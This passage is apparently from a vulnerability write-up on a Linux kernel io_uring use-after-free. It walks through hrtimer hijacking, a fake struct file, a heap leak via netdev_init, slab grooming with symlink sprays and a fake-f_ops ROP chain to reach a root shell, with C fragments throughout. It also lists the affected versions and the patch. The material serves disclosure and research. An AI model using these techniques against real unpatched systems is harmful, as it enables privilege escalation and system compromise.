Then __run_hrtimer calls our function, and it only skips re-enqueueing the timer if the function returned HRTIMER_NORESTART (0x00) or the state still has the HRTIMER_STATE_ENQUEUED flag set (which it no longer does, since it was just overwritten).
So, in summary, besides giving us a single function call, our function needs to return 0x00. The way to exploit this is to install a fake file object that we control.
To do this we want to call fd_install
:
/*
* Install a file pointer in the fd array.
*
* The VFS is full of places where we drop the files lock between
* setting the open_fds bitmap and installing the file in the file
* array. At any such point, we are vulnerable to a dup2() race
* installing a file in the array before us. We need to detect this and
* fput() the struct file we are about to overwrite in this case.
*
* It should never happen - if we allow dup2() do it, _really_ bad things
* will follow.
*
* This consumes the "file" refcount, so callers should treat it
* as if they had called fput(file).
*/
void fd_install(unsigned int fd, struct file *file)
And in our case we call receive_fd
:
int receive_fd(struct file *file, unsigned int o_flags)
{
return __receive_fd(file, NULL, o_flags);
}
/**
* __receive_fd() - Install received file into file descriptor table
* @file: struct file that was received from another process
* @ufd: __user pointer to write new fd number to
* @o_flags: the O_* flags to apply to the new fd entry
*
* Installs a received file into the file descriptor table, with appropriate
* checks and count updates. Optionally writes the fd number to userspace, if
* @ufd is non-NULL.
*
* This helper handles its own reference counting of the incoming
* struct file.
*
* Returns newly install fd or -ve on error.
*/
int __receive_fd(struct file *file, int __user *ufd, unsigned int o_flags)
{
int new_fd;
int error;
error = security_file_receive(file);
if (error)
return error;
new_fd = get_unused_fd_flags(o_flags);
if (new_fd < 0)
return new_fd;
if (ufd) {
error = put_user(new_fd, ufd);
if (error) {
put_unused_fd(new_fd);
return error;
}
}
fd_install(new_fd, get_file(file));
__receive_sock(file);
return new_fd;
}
And luckily __receive_fd
:
Returns newly install fd or -ve on error.
By calling close
on fd-0
(stdin
) before the timer fires, we can ensure that the function returns 0x00
.
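A hedged illustration of that trick (a fragment; backup_fd_stdin matches the descriptor restored later with dup2()):

/* Keep a copy of the real stdin, then free up fd 0 right before the timer
 * fires: get_unused_fd_flags() will hand out 0, so __receive_fd() returns 0,
 * which __run_hrtimer() treats as HRTIMER_NORESTART. */
int backup_fd_stdin = dup(0);
close(0);
/* ... let the hijacked hrtimer fire and call receive_fd(<fake file>, 0) ... */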
After __receive_fd has been called and our dirty file has been installed, the initial UAF has been transformed into a UAF on a struct file object, which is much more useful.
sizeof(struct file) == 232
so to control every field of thestruct file
object we need to controlceil(232 / 92) == 3
objects.
f_ops / Heap leak
Before we continue, what can we actually do with the dirty file? Given that we control the first chunk of the file object, we can overwrite f_ops to point to some arbitrary function (as long as the kernel has a pointer to that function).
In this case it was easiest to first get a heap leak and construct a ROP chain in the chunks following that one. To get a heap leak there exists netdev_init:
/* Initialize per network namespace state */
static int __net_init netdev_init(struct net *net)
{
BUILD_BUG_ON(GRO_HASH_BUCKETS >
8 * sizeof_field(struct napi_struct, gro_bitmask));
INIT_LIST_HEAD(&net->dev_base_head);
net->dev_name_head = netdev_create_hash();
if (net->dev_name_head == NULL)
goto err_name;
net->dev_index_head = netdev_create_hash();
if (net->dev_index_head == NULL)
goto err_idx;
RAW_INIT_NOTIFIER_HEAD(&net->netdev_chain);
return 0;
err_idx:
kfree(net->dev_name_head);
err_name:
return -ENOMEM;
}
This results in a ‘two-way’ heap leak. Firstly, it leaks the address of &net->dev_base_head
due to the presence of INIT_LIST_HEAD
. Secondly, net->dev_name_head
, net->dev_index_head
, and net->netdev_chain
are truncated with null bytes, making it possible for us to detect their location. It's possible to detect these changes as long as we spray with a technique that allows us to read back what we sprayed, for example symlinks.
Another thing that helps us is that these two ‘changes’ are at different offsets: dev_base_head is at net+144 and dev_index_head at net+304, immediately revealing the location of some sprayed chunks, namely 1 and 3 chunks after our original base chunk.
To determine the base chunk, we can utilize dup
to increment our f_count at file+56
. With this adjustment, we can iterate through all the chunks under our control, obtaining the heap leak, and then match these chunks with their symlink indexes.
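A hedged sketch of the read-back part of this (it assumes the symlinks live on tmpfs under an existing /tmp/spray directory and that an ~90-byte target string is kept in a kmalloc-96 allocation; names, sizes and counts are illustrative):

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NR_LINKS   1024
#define TARGET_LEN 89 /* + NUL -> kmalloc-96 */

/* Spray symlink target strings so they sit next to / on top of the chunks
 * the fake file object overlaps. */
static void spray_symlinks(void)
{
    char target[TARGET_LEN + 1], path[64];

    memset(target, 'A', TARGET_LEN);
    target[TARGET_LEN] = '\0';
    for (int i = 0; i < NR_LINKS; i++) {
        snprintf(path, sizeof(path), "/tmp/spray/%d", i);
        symlink(target, path); /* target string ends up in kmalloc-96 */
    }
}

/* After the fake file op has invoked netdev_init(), read everything back
 * and look for the chunks it wrote into. */
static int find_modified_chunk(void)
{
    char expected[TARGET_LEN], buf[TARGET_LEN], path[64];
    ssize_t n;

    memset(expected, 'A', TARGET_LEN);
    for (int i = 0; i < NR_LINKS; i++) {
        snprintf(path, sizeof(path), "/tmp/spray/%d", i);
        n = readlink(path, buf, sizeof(buf));
        /* A shortened or altered target means netdev_init() wrote into this
         * chunk (nulled hash heads, or the self-referencing dev_base_head
         * list pointers); the overwritten bytes are the heap leak. */
        if (n != TARGET_LEN || memcmp(buf, expected, TARGET_LEN))
            return i;
    }
    return -1;
}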
Initial Spray
With dev_index_head
located at net+304
, the goal is to gain control over ceil(304/92) = 4
consecutive chunks. To do this we first fill up the holes in the current CPU's partial list and free some objects on a different CPU, ensuring that the slabs containing objects we don't fully control land on another CPU's partial list. Only then can we fill up some new slabs and free some objects, so that the current CPU's partial list is full of slabs of consecutive objects we control.
Because it takes some tries (and time) to trigger the bug, this step has to be redone every n tries.
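The per-CPU part of this relies on CPU affinity; a hedged fragment (the CPU numbers used during the spray are placeholders):

#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to `cpu` so that subsequent allocations and frees
 * go through that CPU's SLUB per-CPU / partial lists. */
static void pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);
}

For example, freeing a set of filler objects while pinned to another CPU makes their slabs end up on that CPU's partial list, as described above.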
Shell
Now, to get RIP control, we can free the first chunk and spray the first part of the ROP chain, then repeat the process for the third chunk. Lastly, we also free our base chunk and spray a new f_ops pointing to our ROP chain, finally giving us root.
Now, as root, it's not yet possible to call system("sh"), because stdin (fd-0) still points to our dirty file, so let's just free and close it again. Well, to do this we again need to reallocate our f_ops to some fops that does not implement flush (it would probably panic if it did call it), call close(0) and then dup2(backup_fd_stdin, 0).
And finally we have a shell (and hope it doesn’t break within a few seconds because the rbtree
of the timer is most likely still slightly broken).
Affected versions
Even though the bug seemed to be fixed in ~v6.0 (taken from the 5.10 & 5.15 fix commit):
While reworking the poll hashing in the v6.0 kernel, we ended up grabbing the ctx->uring_lock in poll update/removal. This also fixed a bug with linked timeouts racing with timeout expiry and poll removal. Bring back just the locking fix for that.
My reproducer was still able to crash upstream (because the uring_lock was only held selectively).
The final patch just holds the uring_lock
while removing (and completing) a poll request.
Versions 5.13 - 6.4
and 5.10.162 - 5.10.185
were affected.
Patch commits: